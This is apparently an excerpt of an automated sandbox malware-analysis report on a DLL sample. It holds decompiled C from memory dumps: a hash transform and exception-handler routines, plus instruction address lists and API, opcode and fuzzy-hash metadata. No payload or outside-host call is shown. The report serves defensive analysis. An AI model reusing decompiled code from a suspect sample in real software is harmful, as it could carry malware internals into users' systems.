                				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                				asm("ror ecx, 0xb");
                				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                				asm("rol eax, 0x6");
                				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                				asm("rol edx, 0xa");
                				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                				asm("rol esi, 0xf");
                				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                				asm("ror ecx, 0xb");
                				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                				asm("rol eax, 0x6");
                				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                				asm("rol edx, 0xa");
                				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                				asm("rol esi, 0xf");
                				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                				asm("ror edi, 0xb");
                				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                				asm("rol eax, 0x6");
                				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                				asm("rol edx, 0xa");
                				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                				_t399 = _a4;
                				asm("rol esi, 0xf");
                				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                				 *_t399 =  *_t399 + _t259;
                				asm("ror eax, 0xb");
                				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                				return memset( &_v76, 0, 0x40);
                			}

                0x01c14371
                0x01c1437c
                0x01c1437f
                0x01c14382
                0x01c14383
                0x01c14383
                0x01c1438e
                0x01c1439f
                0x01c143a1
                0x01c143a4
                0x01c143a4
                0x01c143a7
                0x01c143a7
                0x01c143aa
                0x01c143aa
                0x01c143ad
                0x01c143ad
                0x01c143ca
                0x01c143cd
                0x01c143e3
                0x01c143e6
                0x01c14400
                0x01c14403
                0x01c14419
                0x01c1441c
                0x01c1441e
                0x01c14436
                0x01c14439
                0x01c1443c
                0x01c14454
                0x01c14457
                0x01c14471
                0x01c14474
                0x01c1448a
                0x01c1448d
                0x01c1448f
                0x01c144a7
                0x01c144ac
                0x01c144af
                0x01c144c5
                0x01c144c8
                0x01c144e2
                0x01c144e5
                0x01c144fb
                0x01c144fe
                0x01c14500
                0x01c1451b
                0x01c1451e
                0x01c14535
                0x01c14538
                0x01c1453c
                0x01c14555
                0x01c14558
                0x01c1455a
                0x01c1455d
                0x01c14578
                0x01c1457b
                0x01c14594
                0x01c14597
                0x01c145a7
                0x01c145aa
                0x01c145c2
                0x01c145c5
                0x01c145df
                0x01c145e2
                0x01c145fa
                0x01c145fd
                0x01c14613
                0x01c14616
                0x01c1462e
                0x01c14631
                0x01c14649
                0x01c1464c
                0x01c14666
                0x01c14669
                0x01c1467f
                0x01c14682
                0x01c1469a
                0x01c1469d
                0x01c146b7
                0x01c146ba
                0x01c146d2
                0x01c146d5
                0x01c146eb
                0x01c146ee
                0x01c14706
                0x01c14709
                0x01c14721
                0x01c14724
                0x01c14736
                0x01c14739
                0x01c1474b
                0x01c1474e
                0x01c14760
                0x01c14763
                0x01c14767
                0x01c14777
                0x01c1477a
                0x01c14788
                0x01c1478b
                0x01c1479d
                0x01c147a0
                0x01c147b4
                0x01c147b7
                0x01c147b9
                0x01c147c9
                0x01c147cc
                0x01c147de
                0x01c147e1
                0x01c147ef
                0x01c147f2
                0x01c14804
                0x01c14807
                0x01c1480b
                0x01c1481b
                0x01c1481e
                0x01c14830
                0x01c14833
                0x01c14841
                0x01c14844
                0x01c14856
                0x01c14859
                0x01c1486b
                0x01c1486e
                0x01c14882
                0x01c14885
                0x01c14899
                0x01c1489c
                0x01c148b0
                0x01c148b3
                0x01c148c7
                0x01c148ca
                0x01c148de
                0x01c148e1
                0x01c148f5
                0x01c148fa
                0x01c1490c
                0x01c1490f
                0x01c14923
                0x01c14926
                0x01c1493a
                0x01c1493d
                0x01c14953
                0x01c14956
                0x01c1496a
                0x01c1496d
                0x01c1497f
                0x01c14982
                0x01c14996
                0x01c14999
                0x01c149ad
                0x01c149b0
                0x01c149c4
                0x01c149cd
                0x01c149d0
                0x01c149d9
                0x01c149e2
                0x01c149ea
                0x01c149f2
                0x01c149fc
                0x01c14a11

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: 975b50852a7db70ec818c36c2022680df3a2678fc47ff7de6eecce9a235c2820
                • Instruction ID: 1a982a666264736c7f7448461ebb4c0145969ef4123e8fc268377d7a7eced9d6
                • Opcode Fuzzy Hash: 975b50852a7db70ec818c36c2022680df3a2678fc47ff7de6eecce9a235c2820
                • Instruction Fuzzy Hash: 8C22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: 264a606b35063c7ea33b62417bfac11855558322b448b55edcca933e797433aa
                • Instruction ID: 9059dad05260b3d11991157d88ebf3fb4bf60b980633bc6d8101c4539272f0e5
                • Opcode Fuzzy Hash: 264a606b35063c7ea33b62417bfac11855558322b448b55edcca933e797433aa
                • Instruction Fuzzy Hash: 9222847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: f8b099e17aa770ec9532e6279bc87aa57e63f61320e9184c9368ef102e64273a
                • Instruction ID: 9dbcc8d617b4210a16a683abf4ff1e6570c20b251b025c882667bbcd6bc4efbf
                • Opcode Fuzzy Hash: f8b099e17aa770ec9532e6279bc87aa57e63f61320e9184c9368ef102e64273a
                • Instruction Fuzzy Hash: F7426730E00B458FCB29CF69C4906AAB7F1FF59304F28896DD48B9B755E774A586CB10
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memcpy.NTDLL(?,?,00000000,000000FE,?,?,00000000), ref: 046E1070
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: 667da8dc60931e01bb14bab750946fddc698049914cf61e4518a05deaec0d291
                • Instruction ID: 854e2a7aa4f2392c084421e5b7563b507ada3942615773610de33fd0b98ae563
                • Opcode Fuzzy Hash: 667da8dc60931e01bb14bab750946fddc698049914cf61e4518a05deaec0d291
                • Instruction Fuzzy Hash: 2F325770A01214DBDF19CF5AC4906BDBBF2FF55304F24859AD815AB386E774EA81DB80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C182F5(long _a4) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				signed int _v16;
                				short* _v32;
                				void _v36;
                				void* _t57;
                				signed int _t58;
                				signed int _t61;
                				signed int _t62;
                				void* _t63;
                				signed int* _t68;
                				intOrPtr* _t69;
                				intOrPtr* _t71;
                				intOrPtr _t72;
                				intOrPtr _t75;
                				void* _t76;
                				signed int _t77;
                				void* _t78;
                				void _t80;
                				signed int _t81;
                				signed int _t84;
                				signed int _t86;
                				short* _t87;
                				void* _t89;
                				signed int* _t90;
                				long _t91;
                				signed int _t93;
                				signed int _t94;
                				signed int _t100;
                				signed int _t102;
                				void* _t104;
                				long _t108;
                				signed int _t110;
                
                				_t108 = _a4;
                				_t76 =  *(_t108 + 8);
                				if((_t76 & 0x00000003) != 0) {
                					L3:
                					return 0;
                				}
                				_a4 =  *[fs:0x4];
                				_v8 =  *[fs:0x8];
                				if(_t76 < _v8 || _t76 >= _a4) {
                					_t102 =  *(_t108 + 0xc);
                					__eflags = _t102 - 0xffffffff;
                					if(_t102 != 0xffffffff) {
                						_t91 = 0;
                						__eflags = 0;
                						_a4 = 0;
                						_t57 = _t76;
                						do {
                							_t80 =  *_t57;
                							__eflags = _t80 - 0xffffffff;
                							if(_t80 == 0xffffffff) {
                								goto L9;
                							}
                							__eflags = _t80 - _t91;
                							if(_t80 >= _t91) {
                								L20:
                								_t63 = 0;
                								L60:
                								return _t63;
                							}
                							L9:
                							__eflags =  *(_t57 + 4);
                							if( *(_t57 + 4) != 0) {
                								_t12 =  &_a4;
                								 *_t12 = _a4 + 1;
                								__eflags =  *_t12;
                							}
                							_t91 = _t91 + 1;
                							_t57 = _t57 + 0xc;
                							__eflags = _t91 - _t102;
                						} while (_t91 <= _t102);
                						__eflags = _a4;
                						if(_a4 == 0) {
                							L15:
                							_t81 =  *0x1c1a338; // 0x0
                							_t110 = _t76 & 0xfffff000;
                							_t58 = 0;
                							__eflags = _t81;
                							if(_t81 <= 0) {
                								L18:
                								_t104 = _t102 | 0xffffffff;
                								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                								__eflags = _t61;
                								if(_t61 < 0) {
                									_t62 = 0;
                									__eflags = 0;
                								} else {
                									_t62 = _a4;
                								}
                								__eflags = _t62;
                								if(_t62 == 0) {
                									L59:
                									_t63 = _t104;
                									goto L60;
                								} else {
                									__eflags = _v12 - 0x1000000;
                									if(_v12 != 0x1000000) {
                										goto L59;
                									}
                									__eflags = _v16 & 0x000000cc;
                									if((_v16 & 0x000000cc) == 0) {
                										L46:
                										_t63 = 1;
                										 *0x1c1a380 = 1;
                										__eflags =  *0x1c1a380;
                										if( *0x1c1a380 != 0) {
                											goto L60;
                										}
                										_t84 =  *0x1c1a338; // 0x0
                										__eflags = _t84;
                										_t93 = _t84;
                										if(_t84 <= 0) {
                											L51:
                											__eflags = _t93;
                											if(_t93 != 0) {
                												L58:
                												 *0x1c1a380 = 0;
                												goto L5;
                											}
                											_t77 = 0xf;
                											__eflags = _t84 - _t77;
                											if(_t84 <= _t77) {
                												_t77 = _t84;
                											}
                											_t94 = 0;
                											__eflags = _t77;
                											if(_t77 < 0) {
                												L56:
                												__eflags = _t84 - 0x10;
                												if(_t84 < 0x10) {
                													_t86 = _t84 + 1;
                													__eflags = _t86;
                													 *0x1c1a338 = _t86;
                												}
                												goto L58;
                											} else {
                												do {
                													_t68 = 0x1c1a340 + _t94 * 4;
                													_t94 = _t94 + 1;
                													__eflags = _t94 - _t77;
                													 *_t68 = _t110;
                													_t110 =  *_t68;
                												} while (_t94 <= _t77);
                												goto L56;
                											}
                										}
                										_t69 = 0x1c1a33c + _t84 * 4;
                										while(1) {
                											__eflags =  *_t69 - _t110;
                											if( *_t69 == _t110) {
                												goto L51;
                											}
                											_t93 = _t93 - 1;
                											_t69 = _t69 - 4;
                											__eflags = _t93;
                											if(_t93 > 0) {
                												continue;
                											}
                											goto L51;
                										}
                										goto L51;
                									}
                									_t87 = _v32;
                									__eflags =  *_t87 - 0x5a4d;
                									if( *_t87 != 0x5a4d) {
                										goto L59;
                									}
                									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                									__eflags =  *_t71 - 0x4550;
                									if( *_t71 != 0x4550) {
                										goto L59;
                									}
                									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                										goto L59;
                									}
                									_t78 = _t76 - _t87;
                									__eflags =  *((short*)(_t71 + 6));
                									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                									if( *((short*)(_t71 + 6)) <= 0) {
                										goto L59;
                									}
                									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                									__eflags = _t78 - _t72;
                									if(_t78 < _t72) {
                										goto L46;
                									}
                									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                										goto L46;
                									}
                									__eflags =  *(_t89 + 0x27) & 0x00000080;
                									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                										goto L20;
                									}
                									goto L46;
                								}
                							} else {
                								goto L16;
                							}
                							while(1) {
                								L16:
                								__eflags =  *((intOrPtr*)(0x1c1a340 + _t58 * 4)) - _t110;
                								if( *((intOrPtr*)(0x1c1a340 + _t58 * 4)) == _t110) {
                									break;
                								}
                								_t58 = _t58 + 1;
                								__eflags = _t58 - _t81;
                								if(_t58 < _t81) {
                									continue;
                								}
                								goto L18;
                							}
                							__eflags = _t58;
                							if(_t58 <= 0) {
                								goto L5;
                							}
                							 *0x1c1a380 = 1;
                							__eflags =  *0x1c1a380;
                							if( *0x1c1a380 != 0) {
                								goto L5;
                							}
                							__eflags =  *((intOrPtr*)(0x1c1a340 + _t58 * 4)) - _t110;
                							if( *((intOrPtr*)(0x1c1a340 + _t58 * 4)) == _t110) {
                								L32:
                								_t100 = 0;
                								__eflags = _t58;
                								if(_t58 < 0) {
                									L34:
                									 *0x1c1a380 = 0;
                									goto L5;
                								} else {
                									goto L33;
                								}
                								do {
                									L33:
                									_t90 = 0x1c1a340 + _t100 * 4;
                									_t100 = _t100 + 1;
                									__eflags = _t100 - _t58;
                									 *_t90 = _t110;
                									_t110 =  *_t90;
                								} while (_t100 <= _t58);
                								goto L34;
                							}
                							_t25 = _t81 - 1; // -1
                							_t58 = _t25;
                							__eflags = _t58;
                							if(_t58 < 0) {
                								L28:
                								__eflags = _t81 - 0x10;
                								if(_t81 < 0x10) {
                									_t81 = _t81 + 1;
                									__eflags = _t81;
                									 *0x1c1a338 = _t81;
                								}
                								_t28 = _t81 - 1; // 0x0
                								_t58 = _t28;
                								goto L32;
                							} else {
                								goto L25;
                							}
                							while(1) {
                								L25:
                								__eflags =  *((intOrPtr*)(0x1c1a340 + _t58 * 4)) - _t110;
                								if( *((intOrPtr*)(0x1c1a340 + _t58 * 4)) == _t110) {
                									break;
                								}
                								_t58 = _t58 - 1;
                								__eflags = _t58;
                								if(_t58 >= 0) {
                									continue;
                								}
                								break;
                							}
                							__eflags = _t58;
                							if(__eflags >= 0) {
                								if(__eflags == 0) {
                									goto L34;
                								}
                								goto L32;
                							}
                							goto L28;
                						}
                						_t75 =  *((intOrPtr*)(_t108 - 8));
                						__eflags = _t75 - _v8;
                						if(_t75 < _v8) {
                							goto L20;
                						}
                						__eflags = _t75 - _t108;
                						if(_t75 >= _t108) {
                							goto L20;
                						}
                						goto L15;
                					}
                					L5:
                					_t63 = 1;
                					goto L60;
                				} else {
                					goto L3;
                				}
                			}

                APIs
                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 01C183A6
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: MemoryQueryVirtual
                • String ID:
                • API String ID: 2850889275-0
                • Opcode ID: 5788de331da6c71168bb3a0381be25682cee165133c2923ebf504b51df6dc25f
                • Instruction ID: 36dbc194bb0a7a50c75033ba1abbb5e68c87bd1b9b4f14dfb3c2a3d21f521a19
                • Opcode Fuzzy Hash: 5788de331da6c71168bb3a0381be25682cee165133c2923ebf504b51df6dc25f
                • Instruction Fuzzy Hash: F261F5307C8602CFEB2ACE2DC49072977A1FB47B64BA8852CD902C729DE730D942B750
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: f86f12e13cd78f569b534fe0b2bfd48979d058aed749059fa06a831eb66540ca
                • Instruction ID: f37269da186c0fb70566dfecf4b6962a872a3af1bcda0bce70885a707b2a8a55
                • Opcode Fuzzy Hash: f86f12e13cd78f569b534fe0b2bfd48979d058aed749059fa06a831eb66540ca
                • Instruction Fuzzy Hash: C1D14D71A0024ADFCF18CF68D4905BEB7B2FF98314F24856DE85297390E771A955CB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 046D9509
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CreateProcessUser
                • String ID:
                • API String ID: 2217836671-0
                • Opcode ID: 7057aaccf1ef2fd44afb6a59b0b8741260a41db2a5b44a6070ec7e0745944a66
                • Instruction ID: f06cade3e24717eee0d412d45ba89474d45c607083cad32a711a258780820041
                • Opcode Fuzzy Hash: 7057aaccf1ef2fd44afb6a59b0b8741260a41db2a5b44a6070ec7e0745944a66
                • Instruction Fuzzy Hash: D011A272104249BFEF025F99DC00DEA7BA6FF28364B455214FE1996120E736E971AB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlNtStatusToDosError.NTDLL(00000000), ref: 046CED01
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorStatus
                • String ID:
                • API String ID: 1596131371-0
                • Opcode ID: d37939e3343897ac12358de52d183015afa422cacd47a39eeb1bdd1c82d2d0d4
                • Instruction ID: 0114e56b03267afd6be4a5f52986d4aa73c44314d09cb30e0105d9f9cc1fda3e
                • Opcode Fuzzy Hash: d37939e3343897ac12358de52d183015afa422cacd47a39eeb1bdd1c82d2d0d4
                • Instruction Fuzzy Hash: 9DC012325043026FDB086A11D81DE3A7F61EB90340F00941DB045CA070E675AC50C610
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
                • Instruction ID: 37bb05580ae3efb224e5ac30118ffc637203100c898d07479eb1ded158c55e2a
                • Opcode Fuzzy Hash: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
                • Instruction Fuzzy Hash: 06F14430A09649EBCB0CCF9AD0A04BDBBB2FF89314B14C19DE5966B785D7346A45CF14
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fe123143a2a597ae7028cb8c9106cb29c1440b2ff6c147516b55ca1152ca1576
                • Instruction ID: e5a53005cb9b5708e33fda215bb40b528c0f2614fdcb6c450e98554abab9614e
                • Opcode Fuzzy Hash: fe123143a2a597ae7028cb8c9106cb29c1440b2ff6c147516b55ca1152ca1576
                • Instruction Fuzzy Hash: 2F61083590011ADFDF24DF50DA84BAABBB5FB84324F1981D8D9096B215D330EE95DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 892c46ab68a9a7c455b9328f591958cc0caa9b27ad465b0f348c2d9614ca5541
                • Instruction ID: 0c5173fe766feae98227769536015c8531cbbcd4637ba64e2c93777a38e7e554
                • Opcode Fuzzy Hash: 892c46ab68a9a7c455b9328f591958cc0caa9b27ad465b0f348c2d9614ca5541
                • Instruction Fuzzy Hash: 04410535A0011ADFDF14DF44DA84FA9BBB5FB88324F1991D9D8096B216D330AE81DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 34181cb298b9ebb261b6fc827779b03ef95010570c3b64f2a1e48dd541c684df
                • Instruction ID: 0ff7e1a27a05c9e7162a6dccb8bee5ab4d71b3e797ad866e5908e279b6cb1169
                • Opcode Fuzzy Hash: 34181cb298b9ebb261b6fc827779b03ef95010570c3b64f2a1e48dd541c684df
                • Instruction Fuzzy Hash: 0C413A3690021ADFDF20DF44CA84FA9BBB5FB48314F194598D9496B216D330EE95CF60
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aa391599a87f26d5eab22df2a57a3fefcd00e352b60ce1cddf8e3bf4d3be2f71
                • Instruction ID: 77cb4f0bd8614f8f4637b2d5731a21e3aede4f09ca3ab426ef23b9844a21065e
                • Opcode Fuzzy Hash: aa391599a87f26d5eab22df2a57a3fefcd00e352b60ce1cddf8e3bf4d3be2f71
                • Instruction Fuzzy Hash: 6821648AC09354BBEE414538C4EA7D21780E77F394FA57C39E8198B582A81C37DFB240
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 43134c780c4c62079c2536a2aec43182ac33b7f5157641fa51b711ff6ab45be4
                • Instruction ID: 4a7c51d54411888b0f0cc46cf8254025277ca9429f602dc0779e81cb610d4340
                • Opcode Fuzzy Hash: 43134c780c4c62079c2536a2aec43182ac33b7f5157641fa51b711ff6ab45be4
                • Instruction Fuzzy Hash: 7421628AC09364BBEE414538C4EA7D21780E77F394FA57C39E8198B582A81C37DFB240
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6101d6c8bbf9d043b3405ad5b125d0c72f0daac772f188aa36f29a39da668586
                • Instruction ID: 1dbfb855463a75bb98caabeb571054e170afcc963e077eb7671493da59aa4f4c
                • Opcode Fuzzy Hash: 6101d6c8bbf9d043b3405ad5b125d0c72f0daac772f188aa36f29a39da668586
                • Instruction Fuzzy Hash: 9D313776600216DFDB24DF58C984FA9BBB5FF88324F198198D90A6B615D330AD80CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E01C180D0(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                				intOrPtr _v8;
                				char _v12;
                				void* __ebp;
                				signed int* _t43;
                				char _t44;
                				void* _t46;
                				void* _t49;
                				intOrPtr* _t53;
                				void* _t54;
                				void* _t65;
                				long _t66;
                				signed int* _t80;
                				signed int* _t82;
                				void* _t84;
                				signed int _t86;
                				void* _t89;
                				void* _t95;
                				void* _t96;
                				void* _t99;
                				void* _t106;
                
                				_t43 = _t84;
                				_t65 = __ebx + 2;
                				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                				_t89 = _t95;
                				_t96 = _t95 - 8;
                				_push(_t65);
                				_push(_t84);
                				_push(_t89);
                				asm("cld");
                				_t66 = _a8;
                				_t44 = _a4;
                				if(( *(_t44 + 4) & 0x00000006) != 0) {
                					_push(_t89);
                					E01C1823B(_t66 + 0x10, _t66, 0xffffffff);
                					_t46 = 1;
                				} else {
                					_v12 = _t44;
                					_v8 = _a12;
                					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                					_t86 =  *(_t66 + 0xc);
                					_t80 =  *(_t66 + 8);
                					_t49 = E01C182F5(_t66);
                					_t99 = _t96 + 4;
                					if(_t49 == 0) {
                						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                						goto L11;
                					} else {
                						while(_t86 != 0xffffffff) {
                							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                							if(_t53 == 0) {
                								L8:
                								_t80 =  *(_t66 + 8);
                								_t86 = _t80[_t86 + _t86 * 2];
                								continue;
                							} else {
                								_t54 =  *_t53();
                								_t89 = _t89;
                								_t86 = _t86;
                								_t66 = _a8;
                								_t55 = _t54;
                								_t106 = _t54;
                								if(_t106 == 0) {
                									goto L8;
                								} else {
                									if(_t106 < 0) {
                										_t46 = 0;
                									} else {
                										_t82 =  *(_t66 + 8);
                										E01C181E0(_t55, _t66);
                										_t89 = _t66 + 0x10;
                										E01C1823B(_t89, _t66, 0);
                										_t99 = _t99 + 0xc;
                										E01C182D7(_t82[2]);
                										 *(_t66 + 0xc) =  *_t82;
                										_t66 = 0;
                										_t86 = 0;
                										 *(_t82[2])(1);
                										goto L8;
                									}
                								}
                							}
                							goto L13;
                						}
                						L11:
                						_t46 = 1;
                					}
                				}
                				L13:
                				return _t46;
                			}
                0x01c180d4
                0x01c180d5
                0x01c180d6
                0x01c180d9
                0x01c180db
                0x01c180de
                0x01c180df
                0x01c180e1
                0x01c180e2
                0x01c180e3
                0x01c180e6
                0x01c180f0
                0x01c181a1
                0x01c181a8
                0x01c181b1
                0x01c180f6
                0x01c180f6
                0x01c180fc
                0x01c18102
                0x01c18105
                0x01c18108
                0x01c1810c
                0x01c18111
                0x01c18116
                0x01c18196
                0x00000000
                0x01c18118
                0x01c18118
                0x01c18124
                0x01c18126
                0x01c18181
                0x01c18181
                0x01c18187
                0x00000000
                0x01c18128
                0x01c18137
                0x01c18139
                0x01c1813a
                0x01c1813b
                0x01c1813e
                0x01c1813e
                0x01c18140
                0x00000000
                0x01c18142
                0x01c18142
                0x01c1818c
                0x01c18144
                0x01c18144
                0x01c18148
                0x01c18150
                0x01c18155
                0x01c1815a
                0x01c18166
                0x01c1816e
                0x01c18175
                0x01c1817b
                0x01c1817f
                0x00000000
                0x01c1817f
                0x01c18142
                0x01c18140
                0x00000000
                0x01c18126
                0x01c1819a
                0x01c1819a
                0x01c1819a
                0x01c18116
                0x01c181b6
                0x01c181bd

                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
